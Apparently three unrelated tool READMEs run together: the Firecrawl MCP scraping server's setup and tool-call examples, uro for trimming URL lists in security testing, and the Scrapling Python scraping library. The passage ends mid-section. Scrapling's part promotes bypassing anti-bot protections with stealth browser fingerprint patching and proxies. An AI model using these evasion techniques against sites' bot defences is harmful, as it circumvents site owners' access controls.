A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.
Big thanks to @vrknetha, @cawstudios for the initial implementation!
You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.
env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp
npm install -g firecrawl-mcp
Configuring Cursor. Note: requires Cursor version 0.45.6+. For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide.
To configure Firecrawl MCP in Cursor v0.45.6:
env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp
To configure Firecrawl MCP in Cursor v0.48.6:
{
  "mcpServers": {
    "firecrawl-mcp": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR-API-KEY"
      }
    }
  }
}
If you are using Windows and are running into issues, try:
cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"
Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys
After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.
Add this to your ./codeium/windsurf/model_config.json:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY"
}
}
}
}
To install Firecrawl for Claude Desktop automatically via Smithery:
npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude
- FIRECRAWL_API_KEY: Your Firecrawl API key
- FIRECRAWL_API_URL (optional): Custom API endpoint for self-hosted instances, e.g. https://firecrawl.your-domain.com
- FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
- FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before the first retry (default: 1000)
- FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
- FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)
- FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
- FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

For cloud API usage with custom retry and credit monitoring:
# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key
# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff
# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits
For self-hosted instance:
# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com
# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth
# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries
Add this to your claude_desktop_config.json:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",
"FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
"FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
"FIRECRAWL_RETRY_MAX_DELAY": "30000",
"FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",
"FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
"FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
}
}
}
}
The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:
const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};
These configurations control:

- Retry behavior: requests that fail due to rate limits are retried automatically with exponential backoff. With the default settings above, retries are attempted after roughly 1 second, 2 seconds, and 4 seconds, capped at the 10-second maximum delay (see the sketch below).
- Credit usage monitoring: warnings are emitted when credit usage crosses the warning and critical thresholds.
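As an illustration only (this is not part of the server's code), here is a small Python sketch of how those retry delays follow from the defaults above:

def retry_delays(max_attempts=3, initial_delay=1000, max_delay=10000, backoff_factor=2):
    """Return the delay in milliseconds applied before each retry attempt."""
    return [min(initial_delay * backoff_factor ** attempt, max_delay)
            for attempt in range(max_attempts)]

print(retry_delays())  # [1000, 2000, 4000] -> retries after 1s, 2s, and 4s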
The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:
firecrawl_scrape: Scrape content from a single URL with advanced options.
{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}
firecrawl_batch_scrape: Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.
{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
Response includes operation ID for status checking:
{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}
firecrawl_check_batch_status: Check the status of a batch operation.
{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}
firecrawl_search: Search the web and optionally extract content from search results.
{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
firecrawl_crawl: Start an asynchronous crawl with advanced options.
{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}
firecrawl_extract: Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.
{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}
Example response:
{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}
- urls: Array of URLs to extract information from
- prompt: Custom prompt for the LLM extraction
- systemPrompt: System prompt to guide the LLM
- schema: JSON schema for structured data extraction
- allowExternalLinks: Allow extraction from external links
- enableWebSearch: Enable web search for additional context
- includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For the cloud API, it uses Firecrawl's managed LLM service.
firecrawl_deep_research: Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.
{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}
Arguments: query (the research question), plus optional maxDepth, timeLimit, and maxUrls, as shown in the example above.
Returns: a final analysis synthesized from the crawled and searched sources.
firecrawl_generate_llmstxt: Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.
{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}
Arguments: url (the site to generate the file for), plus optional maxUrls and showFullText, as shown in the example above.
Returns: the generated llms.txt content (and llms-full.txt when showFullText is enabled).
The server includes comprehensive logging:
Example log messages:
[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...
The server provides robust error handling:
Example error response:
{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}
# Install dependencies
npm install
# Build
npm run build
# Run tests
npm test
MIT License - see LICENSE file for details
Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.
It doesn't make any HTTP requests to the URLs and removes:
- incremental urls, e.g. /page/1/ and /page/2/
- blog posts and similar human-written content, e.g. /posts/a-brief-history-of-time
- urls with the same path but different parameter values, e.g. /page.php?id=1 and /page.php?id=2 (see the sketch below)
- images, js, css and other "useless" files
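As a rough illustration of the "same path but different parameter values" rule only (a simplified sketch, not uro's actual code, which applies many more rules):

from urllib.parse import urlparse, parse_qs

def dedupe_by_params(urls):
    # Keep one URL per (host, path, set-of-parameter-names), so /page.php?id=1
    # and /page.php?id=2 collapse into a single entry.
    seen, kept = set(), []
    for url in urls:
        parsed = urlparse(url)
        key = (parsed.netloc, parsed.path, tuple(sorted(parse_qs(parsed.query))))
        if key not in seen:
            seen.add(key)
            kept.append(url)
    return kept

print(dedupe_by_params([
    "http://example.com/page.php?id=1",
    "http://example.com/page.php?id=2",  # dropped: same path and parameter names
]))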
The recommended way to install uro is as follows:
pipx install uro
Note: If you are using an older version of Python, use pip instead of pipx.
The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.
cat urls.txt | uro
uro -i input.txt
If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.
uro -i input.txt -o output.txt
-w/--whitelist: uro will ignore all other extensions except the ones provided.
uro -w php asp html
Note: Extensionless pages, e.g. /books/1, will still be included. To remove them too, use --filter hasext.
-b/--blacklist: uro will ignore the given extensions.
uro -b jpg png js pdf
Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through the blacklist option. Extensionless pages, e.g. /books/1, will still be included. To remove them too, use --filter hasext.
For granular control, uro supports the following filters:
- hasparams: only output URLs that have query parameters, e.g. http://example.com/page.php?id=
- noparams: only output URLs that don't have query parameters, e.g. http://example.com/page.php
- hasext: only output URLs that have an extension, e.g. http://example.com/page.php
- noext: only output URLs that don't have an extension, e.g. http://example.com/page
- allexts: don't remove any URL based on extension, e.g. keep .jpg URLs which would be removed otherwise
- keepslash: don't remove the trailing slash, e.g. http://example.com/page/

Example: uro --filters hasext hasparams
Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.
Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.
>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!
- HTTP requests with the Fetcher class.
- Dynamic loading and automation with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
- Anti-bot protection bypass with the StealthyFetcher and PlayWrightFetcher classes.

from scrapling.fetchers import Fetcher
fetcher = Fetcher(auto_match=False)
# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))
# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above
# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]
# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...
# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)
To keep it simple, all methods can be chained on top of each other!
Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.
| # | Library | Time (ms) | vs Scrapling |
|---|---------|-----------|--------------|
| 1 | Scrapling | 5.44 | 1.0x |
| 2 | Parsel/Scrapy | 5.53 | 1.017x |
| 3 | Raw Lxml | 6.76 | 1.243x |
| 4 | PyQuery | 21.96 | 4.037x |
| 5 | Selectolax | 67.12 | 12.338x |
| 6 | BS4 with Lxml | 1307.03 | 240.263x |
| 7 | MechanicalSoup | 1322.64 | 243.132x |
| 8 | BS4 with html5lib | 3373.75 | 620.175x |
As you can see, Scrapling is on par with Scrapy and slightly faster than lxml, which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of lxml, but Scrapling is still 4 times faster.
| Library | Time (ms) | vs Scrapling |
|---------|-----------|--------------|
| Scrapling | 2.51 | 1.0x |
| AutoScraper | 11.41 | 4.546x |
Scrapling can find elements with more methods and it returns full element Adaptor objects, not just the text like AutoScraper. So, to make this test fair, both libraries extract an element by text, find similar elements, and then extract the text content of all of them. As you can see, Scrapling is still 4.5 times faster at the same task.
All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.
Scrapling is a breeze to get started with; starting from version 0.2.9, it requires at least Python 3.9.
pip3 install scrapling
Then run this command to install the browser dependencies needed to use the Fetcher classes:
scrapling install
If you have any installation issues, please open an issue.
Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single-request fashion and then return an Adaptor object. This feature was introduced because previously the only option was to fetch the page however you wanted, then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.
You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way
from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher
All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.
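For example, a minimal sketch passing a few of those arguments (the argument names come from the list above; the chosen values are illustrative, not the library defaults):

from scrapling.fetchers import Fetcher

# Values here are just examples; check the docs for the real defaults.
fetcher = Fetcher(auto_match=True, huge_tree=True, keep_comments=False)
page = fetcher.get('https://quotes.toscrape.com/')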
If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:
from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
then use it right away without initializing like:
page = StealthyFetcher.fetch('https://example.com')
Also, the Response object returned from all fetchers is the same as the Adaptor object except that it has these added attributes: status, reason, cookies, headers, history, and request_headers. All of cookies, headers, and request_headers are always plain dictionaries.
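A quick sketch of reading those extra attributes (using the no-initialization defaults import shown above):

from scrapling.defaults import Fetcher

page = Fetcher.get('https://quotes.toscrape.com/')
print(page.status, page.reason)  # e.g. 200 OK
print(page.cookies)              # plain dictionary
print(page.headers)              # plain dictionary
print(page.request_headers)      # headers that were sent with the request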
[!NOTE] The auto_match argument is enabled by default, and it is the one you should care about the most, as you will see later.
This class is built on top of httpx with additional configuration options; here you can do GET, POST, PUT, and DELETE requests.
For all methods, you have stealthy_headers, which makes Fetcher create and use real browser headers and then create a referer header as if the request came from a Google search for this URL's domain. It's enabled by default. You can also set the number of retries with the retries argument for all methods, which makes httpx retry requests if they fail for any reason. The default number of retries for all Fetcher methods is 3.
Note: all headers generated by the stealthy_headers argument can be overwritten by you through the headers argument.
You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030
>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')
For Async requests, you will just replace the import like below:
>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')
This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.
>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection') # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True
Note: all requests made by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.
>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
Note: all requests made by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)
Using this Fetcher class, you can make requests with:
1. Vanilla Playwright without any modifications other than the ones you chose.
2. Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP, but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include:
   - Patching the CDP runtime fingerprint.
   - Mimicking some real browser properties by injecting several JS files and using custom options.
   - Using custom flags on launch to hide Playwright even more and make it faster.
   - Generating real browser headers of the same type and for the same user OS, then appending them to the request's headers.
3. Real browsers, by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher; most of the options can be enabled with it.
4. NSTBrowser's docker browserless option, by passing the CDP URL and enabling the nstbrowser_mode option.
A minimal usage sketch follows the notes below.
Note: using the real_chrome argument requires that you have the Chrome browser installed on your device.
Add that to a lot of controlling/hiding options as you will see in the arguments list below.
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
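A minimal sketch of picking between those run options; only real_chrome and nstbrowser_mode are named in this README, so treat the exact usage as an assumption and check the arguments list/docs:

from scrapling.fetchers import PlayWrightFetcher

page = PlayWrightFetcher().fetch('https://example.com')                    # 1) vanilla Playwright
page = PlayWrightFetcher().fetch('https://example.com', real_chrome=True)  # 3) your installed Chrome (assumed kwarg usage)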
>>> quote.tag
'div'
>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>
>>> quote.parent.tag
'div'
>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]
>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>
>>> quote.children.css_first(".author::text")
'Albert Einstein'
>>> quote.has_class('quote')
True
# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'
# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'
If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below
for ancestor in quote.iterancestors():
# do something with it...
You can search for a specific ancestor of an element that satisfies a function; all you need to do is pass a function that takes an Adaptor object as an argument and returns True if the condition is satisfied or False otherwise, like below:
>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>
You can select elements by their text content in multiple ways, here's a full example on another website:
>>> page = Fetcher().get('https://books.toscrape.com/index.html')
>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>
>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'
>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>
>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]
Find all elements that are similar to the current element in location and attributes
# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]
# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19
# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]
To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason
>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...
The documentation will provide more advanced examples.
Let's say you are scraping a page with a structure like this:
<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>
And you want to scrape the first product, the one with the p1
ID. You will probably write a selector like this
page.css('#p1')
When website owners implement structural changes like
<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>
The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.
from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1', auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...
How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.
Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.
To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverflow's website from 2010, pretty old, huh? Let's test if the auto-matching feature can extract the same button from the old 2010 design and from the current design using the same selector :)
If I want to extract the Questions button from the old design, I can use a selector like this: #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a
This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions
>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'
Note that I used a new argument called automatch_domain. This is because, to Scrapling, these are two different URLs, not the same website, so it isolates their data. To tell Scrapling they are the same website, we pass the domain we want to use for saving auto-match data for both of them so Scrapling doesn't isolate them.
In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain
argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)
Notes:
1. For the two examples above, I used the Adaptor class once and the Fetcher class the second time, just to show that you can create the Adaptor object yourself if you have the source, or fetch the source using any Fetcher class, which will then create the Adaptor object for you.
2. Passing the auto_save argument while the auto_match argument is set to False when initializing the Adaptor/Fetcher object will result in the auto_save argument value being ignored with the following warning message: Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons, so the database only gets created/connected when you are planning to use the auto-matching features. The same applies to the auto_match argument.
3. The auto_match parameter works only for Adaptor instances, not Adaptors collections, so if you do something like page.css('body').css('#p1', auto_match=True) you will get an error, because you can't auto-match a whole list; you have to be specific and do something like page.css_first('body').css('#p1', auto_match=True).
Inspired by BeautifulSoup's find_all function, you can find elements by using the find_all/find methods. Both methods can take multiple types of filters and return all elements in the page that all these filters apply to.
So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order: tag name(s) first, then attributes, then the remaining filters such as functions and regular expressions (illustrated in the sketch below).
Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.
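Conceptually (a generic illustration, not Scrapling's internal code), the waterfall looks like this:

def waterfall(elements, filters):
    # Each filter only sees the elements that survived the previous one.
    for keep in filters:
        elements = [el for el in elements if keep(el)]
    return elements

elements = [
    {"tag": "div", "class": "quote", "text": "Hello world"},
    {"tag": "div", "class": "author", "text": "Albert Einstein"},
    {"tag": "span", "class": "quote", "text": "world"},
]
print(waterfall(elements, [
    lambda el: el["tag"] == "div",      # tag name(s) first
    lambda el: el["class"] == "quote",  # then attributes
    lambda el: "world" in el["text"],   # then custom functions
]))
# -> only the first element survives all three filters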
Examples to clear any confusion :)
>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]
# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]
# Find all elements that have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]
# Find all elements that contain the word 'world' in their content.
